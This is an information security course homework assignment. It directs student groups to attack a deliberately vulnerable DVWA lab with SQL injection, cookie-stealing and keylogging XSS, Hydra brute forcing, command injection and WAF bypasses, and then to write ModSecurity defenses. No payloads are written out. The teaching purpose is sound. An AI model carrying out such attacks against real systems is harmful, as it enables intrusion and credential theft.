# CMP 5006 - Information Security 

## Homework 2

- Work in groups of 2 or  3
- For submission, clone the class repo and create a branch for your homework. You will add your homework to the "homework_2" folder. Create a folder inside with the name format "last_name-hw1". Submit a pull request.
- In D2L submit a zip file with your homework, and in the comments include the link to your pull request.
- Also, in D2L include a grade (between 0 and 10) evaluating the work collaboration of your partners. 

## Overview

In this homework assignment, you will explore various aspects of web security through hands-on exercises. You will work with DVWA (Damn Vulnerable Web Application), Kali Linux, and an open-source WAF (Web Application Firewall). This assignment is designed to give you practical experience with both offensive and defensive security techniques.

## Requirements

- Work in groups of 3-4 students
- Each group needs at least 2 computers:
  - Computer 1: Running Kali Linux (attacker)
  - Computer 2: Running DVWA and ModSecurity WAF (target/defender)
- Duration: 2 weeks
- Deliverable: A comprehensive report detailing your methodology, findings, and mitigation strategies

## Setup Instructions

1. **Computer 1 (Attacker)**:
   - Install Kali Linux (VM is acceptable)
   - Ensure tools like Burp Suite, OWASP ZAP, and sqlmap are installed and updated

2. **Computer 2 (Target/Defender)**:
   - Install DVWA (follow instructions at [DVWA GitHub](https://github.com/digininja/DVWA))
   - Install and configure ModSecurity as your WAF
   - Set up basic logging for the web server



## Problem 1: SQL Injection Attack and Defense 


**Tasks**:
1. Configure DVWA's security level to "low"
2. Using the Kali Linux machine, perform manual SQL injection attacks against DVWA's SQL Injection module
3. Document the process and payloads used
4. Use sqlmap to automate the SQL injection process and extract database information
5. On the defender's side, configure ModSecurity rules to detect and block SQL injection attacks
6. Test the effectiveness of your WAF rules by repeating the attacks
7. Document the rules that successfully blocked attacks and those that allowed attacks through

**Deliverables**:
- Screenshots of successful SQL injection attacks
- sqlmap command output
- ModSecurity rules implemented
- Analysis of defense effectiveness

## Problem 2: Cross-Site Scripting (XSS) Exploitation 


**Tasks**:
1. Identify reflected and stored XSS vulnerabilities in DVWA
2. Craft at least three different XSS payloads with different functions (e.g., cookie stealing, keylogging, phishing)
3. Successfully execute these payloads against the DVWA instance
4. Create custom ModSecurity rules to detect and prevent XSS attacks
5. Test your rules by attempting to bypass them with various encoding techniques
6. Document your findings and the effectiveness of your defensive measures

**Deliverables**:
- Screenshots of successful XSS exploits
- Source code for your XSS payloads
- ModSecurity rules created
- Analysis of evasion techniques and their success/failure

## Problem 3: Brute Force Attack Analysis


**Tasks**:
1. Using Hydra on Kali Linux, perform a brute force attack against DVWA's login page
2. Create a custom wordlist for your attack
3. Configure ModSecurity to implement rate limiting and detect brute force attacks
4. Set up logging to capture login attempts
5. Develop a simple script to analyze logs and identify potential brute force attacks
6. Test the effectiveness of your detection and prevention mechanisms

**Deliverables**:
- Hydra command and output screenshot
- Your custom wordlist (first 10 entries only)
- ModSecurity configuration for brute force prevention
- Log analysis script
- Report on attack detection success rate

## Problem 4: Command Injection Vulnerability 


**Tasks**:
1. Identify command injection vulnerabilities in DVWA
2. Create at least three different command injection payloads
3. Successfully execute these payloads on the target system
4. Document the impact of each payload
5. Implement ModSecurity rules to prevent command injection attacks
6. Test your rules against various bypass techniques
7. Document which techniques were successful in bypassing your defenses

**Deliverables**:
- Screenshots of successful command injections
- Description of payload impact
- ModSecurity rules implemented
- Analysis of defense effectiveness against bypass techniques

## Problem 5: WAF Deployment and Evasion Techniques 


**Tasks**:
1. Deploy ModSecurity with the OWASP Core Rule Set (CRS)
2. Configure the WAF in different security levels (paranoia levels)
3. Create a custom virtual host configuration that protects DVWA
4. Perform attacks against all DVWA modules to test WAF effectiveness
5. Document which attacks are blocked at different paranoia levels
6. Develop at least three different WAF bypass techniques
7. Create a report analyzing the trade-offs between security and false positives
8. Implement custom rules to address the bypass techniques you developed

**Deliverables**:
- Complete ModSecurity configuration files
- Test results of attacks at different paranoia levels
- Documentation of WAF bypass techniques
- Custom rules to address bypass techniques
- Analysis of security vs. usability trade-offs


## Note

Please respect ethical guidelines while performing these exercises. Do not attempt these techniques on systems without explicit permission. All work should be performed in your isolated lab environment only.

